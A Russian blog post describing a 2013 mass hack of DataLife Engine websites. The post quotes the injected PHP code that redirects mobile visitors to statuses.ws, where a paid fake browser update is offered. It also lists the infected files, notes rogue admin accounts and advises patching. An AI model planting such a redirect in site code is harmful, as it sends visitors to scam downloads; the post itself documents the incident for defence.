Сделать домашней|Добавить в избранное
 
 
» » Массовый взлом dle и защита от взлома.
на правах рекламы

Массовый взлом dle и защита от взлома.

Автор: admin от 29-01-2013, 08:36
Массовый взлом dle и защита от взлома.

В начале января огромное количество DLE пользователей забило тревогу. На их сайтах появился хитрый мобильный редирект, организованный через домен statuses.ws. ИМХО целсофту вместо того, чтобы рассылать претензии следует хорошо поработать над защитой движка, так как в данном случае взлом имел массовый характер и ломали с большой долей вероятности автоматизированным скриптом.

Основные симптомы заражения – при попытке зайти с мобильного устройства на сайт качался файл, предлагающий обновить браузер, то, что обновление НЕ БЕСПЛАТНОЕ, думаю, вы догадались и сами.

Сам редирект содержал следующий код -
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],”iPhone”);
$android = strpos($_SERVER['HTTP_USER_AGENT'],”Android”);
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],”webOS”);
$berry = strpos($_SERVER['HTTP_USER_AGENT'],”BlackBerry”);
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],”iPod”);

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header(‘Location: http://statuses.ws/’);
}

Причем на многих сайтах он был вставлен до 10 раз, что явно свидетельствует об автоматизации процесса. Как видно для конкретной OC были приготовлены “свои ништяки”. Данный код был замечен чаще всего в файлах:
/engine/data/config.php
/engine/data/dbconfig.php
/engine/init.php

Также замечено появление новых пользователей с правами админа. Также вставки попадались и в этих файлах:
engine/init.php
index.php

Грешить на хостера, неправильные права на папки и тд. уже не приходилось, речь шла о дырке в движке. Решение проблемы – обновиться до последней на данный момент версии 9.7 и пропатчить ее с оф. сайта.
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

Комментарии:

Оставить комментарий
 

Шаблоны для DataLife Engine 10.4
можно скачать у нас.